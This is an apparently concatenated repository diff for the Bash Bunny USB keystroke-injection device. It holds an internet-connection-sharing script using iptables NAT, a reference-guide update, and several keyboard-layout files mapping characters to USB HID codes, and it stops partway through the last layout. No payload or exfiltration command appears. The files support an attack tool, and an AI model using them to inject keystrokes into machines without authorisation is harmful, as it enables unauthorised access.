ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
|
||||
printf "Detecting Bash Bunny..."
|
||||
until ping $sbunnyip -c1 -w1 >/dev/null
|
||||
do
|
||||
printf "."
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
|
||||
sleep 1
|
||||
done
|
||||
printf "...found.\n\n"
|
||||
printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
|
||||
echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
|
||||
iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
|
||||
iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
|
||||
route del default #remove default route
|
||||
route add default gw $sbunnygw $sbunnywan #add default gateway
|
||||
printf "\n\n"
|
||||
exit
|
||||
}
|
||||
|
||||
function start_clean {
|
||||
# undo all iptables Bashbunny related rules
|
||||
iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
|
||||
iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
|
||||
iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
|
||||
echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
|
||||
}
|
||||
|
||||
function create_bbsh_config {
|
||||
echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
|
||||
echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
|
||||
echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
|
||||
echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
|
||||
echo "sfirsttime=1" >> "$BBSH_CONFIG"
|
||||
}
|
||||
|
||||
function bunny {
|
||||
printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
|
||||
printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
|
||||
exit
|
||||
}
|
||||
|
||||
banner #remove for less 1337
|
||||
showsettings
|
||||
|
||||
# create bbsh_config if it doesn't exist
|
||||
[ -f "$BBSH_CONFIG" ] || create_bbsh_config
|
||||
source "$BBSH_CONFIG"
|
||||
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "
|
||||
Since this is the first time running the BB Internet Connection Sharing\n\
|
||||
script, Guided setup is recommended to save initial configuration.\n\
|
||||
Subsequent sessions may be quickly connected using saved settings.\n"
|
||||
fi
|
||||
|
||||
# Removes iptables rules if the script gets a Ctrl-C
|
||||
trap start_clean INT
|
||||
|
||||
menu
|
|
@ -6,7 +6,7 @@
|
|||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.4 -+-
|
||||
-+- QUICK REFERENCE GUIDE v1.5 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
|
@ -107,6 +107,8 @@
|
|||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
$BB_LABEL Volume name of the BashBunny
|
||||
when mounted.
|
||||
|
||||
|
||||
|
||||
|
@ -153,6 +155,8 @@
|
|||
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
|
||||
GET HOST_IP Returns $HOST_IP
|
||||
GET SWITCH_POSITION Returns $SWITCH_POSITION
|
||||
GET TARGET_OS Returns $TARGET_OS
|
||||
GET BB_LABEL Returns $BB_LABEL
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -165,5 +165,104 @@
|
|||
"\\":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"__comment":"Everything below was additionally added by kuyaya",
|
||||
"GUI-l":"08,00,0f",
|
||||
"RIGHTSHIFT":"20,00,00",
|
||||
"A":"20,00,04",
|
||||
"B":"20,00,05",
|
||||
"C":"20,00,06",
|
||||
"D":"20,00,07",
|
||||
"E":"20,00,08",
|
||||
"F":"20,00,09",
|
||||
"G":"20,00,0a",
|
||||
"H":"20,00,0b",
|
||||
"I":"20,00,0c",
|
||||
"J":"20,00,0d",
|
||||
"K":"20,00,0e",
|
||||
"L":"20,00,0f",
|
||||
"M":"20,00,10",
|
||||
"N":"20,00,11",
|
||||
"O":"20,00,12",
|
||||
"P":"20,00,13",
|
||||
"Q":"20,00,14",
|
||||
"R":"20,00,15",
|
||||
"S":"20,00,16",
|
||||
"T":"20,00,17",
|
||||
"U":"20,00,18",
|
||||
"V":"20,00,19",
|
||||
"W":"20,00,1a",
|
||||
"X":"20,00,1b",
|
||||
"Z":"20,00,1c",
|
||||
"Y":"20,00,1d",
|
||||
"+":"20,00,1e",
|
||||
"\"":"20,00,1f",
|
||||
"*":"20,00,20",
|
||||
"%":"20,00,22",
|
||||
"&":"20,00,23",
|
||||
"/":"20,00,24",
|
||||
"(":"20,00,25",
|
||||
")":"20,00,26",
|
||||
"=":"20,00,27",
|
||||
"?":"20,00,2d",
|
||||
"`":"20,00,2e",
|
||||
"!":"20,00,30",
|
||||
";":"20,00,36",
|
||||
":":"20,00,37",
|
||||
"_":"20,00,38",
|
||||
">":"20,00,64",
|
||||
"°":"02,00,35",
|
||||
"°":"20,00,35",
|
||||
"§":"00,00,35",
|
||||
"ç":"02,00,21",
|
||||
"ç":"20,00,21",
|
||||
"¬":"40,00,23",
|
||||
"¦":"40,00,1e",
|
||||
"¢":"40,00,25",
|
||||
"´":"40,00,2d",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"SHIFT-BACKSPACE":"02,00,2a",
|
||||
"SHIFT-BACKSPACE":"20,00,2a",
|
||||
"€":"40,00,08",
|
||||
"è":"02,00,2f",
|
||||
"è":"20,00,2f",
|
||||
"ü":"00,00,2f",
|
||||
"¨":"00,00,30",
|
||||
"é":"02,00,33",
|
||||
"é":"20,00,33",
|
||||
"ö":"00,00,33",
|
||||
"ä":"00,00,34",
|
||||
"à":"02,00,34",
|
||||
"à":"20,00,34",
|
||||
"£":"02,00,32",
|
||||
"£":"20,00,32",
|
||||
"ALT-GR":"40,00,00",
|
||||
"RIGHTCONTROL":"10,00,00",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"+":"00,00,57",
|
||||
"-":"00,00,56",
|
||||
"*":"00,00,55",
|
||||
"/":"00,00,54",
|
||||
"ENTER":"00,00,58",
|
||||
"DEL":"00,00,63",
|
||||
"INSERT":"00,00,62",
|
||||
"END":"00,00,59",
|
||||
"DOWN":"00,00,5a",
|
||||
"PAGEDOWN":"00,00,5b",
|
||||
"LEFT":"00,00,5c",
|
||||
"RIGHT":"00,00,5e",
|
||||
"HOME":"00,00,5f",
|
||||
"UP":"00,00,60",
|
||||
"PAGEUP":"00,00,61",
|
||||
".":"00,00,63",
|
||||
"0":"00,00,62",
|
||||
"1":"00,00,59",
|
||||
"2":"00,00,5a",
|
||||
"3":"00,00,5b",
|
||||
"4":"00,00,5c",
|
||||
"5":"00,00,5d",
|
||||
"6":"00,00,5e",
|
||||
"7":"00,00,5f",
|
||||
"8":"00,00,60",
|
||||
"9":"00,00,61"
|
||||
}
|
||||
|
|
|
@ -144,7 +144,7 @@
|
|||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
")":"02,00,27",
|
||||
"=":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
|
|
|
@ -56,6 +56,7 @@
|
|||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
|
@ -64,6 +65,7 @@
|
|||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"#":"00,00,31",
|
||||
"__comment":"MIA K42 00,00,32",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
|
@ -102,10 +104,26 @@
|
|||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"KPAD_SLASH":"00,00,54",
|
||||
"KPAD_ASTERISK":"00,00,55",
|
||||
"KPAD_MINUS":"00,00,56",
|
||||
"KPAD_PLUS":"00,00,57",
|
||||
"KPAD_ENTER":"00,00,58",
|
||||
"KPAD_1":"00,00,59",
|
||||
"KPAD_2":"00,00,5a",
|
||||
"KPAD_3":"00,00,5b",
|
||||
"KPAD_4":"00,00,5c",
|
||||
"KPAD_5":"00,00,5d",
|
||||
"KPAD_6":"00,00,5e",
|
||||
"KPAD_7":"00,00,5f",
|
||||
"KPAD_8":"00,00,60",
|
||||
"KPAD_9":"00,00,61",
|
||||
"KPAD_0":"00,00,62",
|
||||
"KPAD_DOT":"00,00,63",
|
||||
"\\":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
|
@ -137,6 +155,7 @@
|
|||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"£":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
|
@ -151,19 +170,26 @@
|
|||
"~":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"@":"02,00,34",
|
||||
"¬":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"|":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-TAB":"04,00,2b",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
"COMMAND":"08,00,00",
|
||||
"COMMAND-CTRL":"09,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"0b,00,00",
|
||||
"COMMAND-OPTION":"0c,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"0e,00,00",
|
||||
"ALTGR":"40,00,00",
|
||||
"ALTGR-TAB":"40,00,2b",
|
||||
"¦":"40,00,35",
|
||||
"CTRL-ALTGR":"41,00,00",
|
||||
"ALTGR-SHIFT":"42,00,00"
|
||||
}
|
|
@ -0,0 +1,187 @@
|
|||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Hungarian QWERTZ language made by Skeleton022",
|
||||
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"ö":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"ü":"00,00,2d",
|
||||
"ó":"00,00,2e",
|
||||
"ő":"00,00,2f",
|
||||
"ú":"00,00,30",
|
||||
"ű":"00,00,31",
|
||||
"é":"00,00,33",
|
||||
"á":"00,00,34",
|
||||
"0":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"í":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"'":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"+":"02,00,20",
|
||||
"!":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"/":"02,00,23",
|
||||
"=":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"Ö":"02,00,27",
|
||||
"Ü":"02,00,2d",
|
||||
"Ó":"02,00,2e",
|
||||
"Ő":"02,00,2f",
|
||||
"Ú":"02,00,30",
|
||||
"Ű":"02,00,31",
|
||||
"É":"02,00,33",
|
||||
"Á":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"Í":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00",
|
||||
"{":"40,00,05",
|
||||
"&":"40,00,06",
|
||||
"[":"40,00,09",
|
||||
"]":"40,00,0a",
|
||||
"}":"40,00,11",
|
||||
"\\":"40,00,14",
|
||||
"@":"40,00,19",
|
||||
"|":"40,00,1a",
|
||||
"#":"40,00,1b",
|
||||
">":"40,00,1d",
|
||||
"~":"40,00,1e",
|
||||
"^":"40,00,20",
|
||||
"`":"40,00,24",
|
||||
"$":"40,00,33",
|
||||
";":"40,00,36",
|
||||
"*":"40,00,38",
|
||||
"<":"40,00,64"
|
||||
}
|
|
@ -0,0 +1,172 @@
|
|||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"\"": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"&": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"'": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"(": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
")": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"=": "02,00,2d",
|
||||
"^": "00,00,2e",
|
||||
"~": "02,00,2e",
|
||||
"@": "00,00,2f",
|
||||
"`": "02,00,2f",
|
||||
"[": "00,00,30",
|
||||
"{": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
"]": "00,00,32",
|
||||
"}": "02,00,32",
|
||||
";": "00,00,33",
|
||||
"+": "02,00,33",
|
||||
":": "00,00,34",
|
||||
"*": "02,00,34",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
|
@ -43,6 +43,9 @@
|
|||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"æ":"00,00,34",
|
||||
"ø":"00,00,33",
|
||||
"å":"00,00,2f",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
|
@ -131,6 +134,9 @@
|
|||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"Æ":"02,00,34",
|
||||
"Ø":"02,00,33",
|
||||
"Å":"02,00,2f",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
|
|
|
@ -0,0 +1,173 @@
|
|||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,34",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
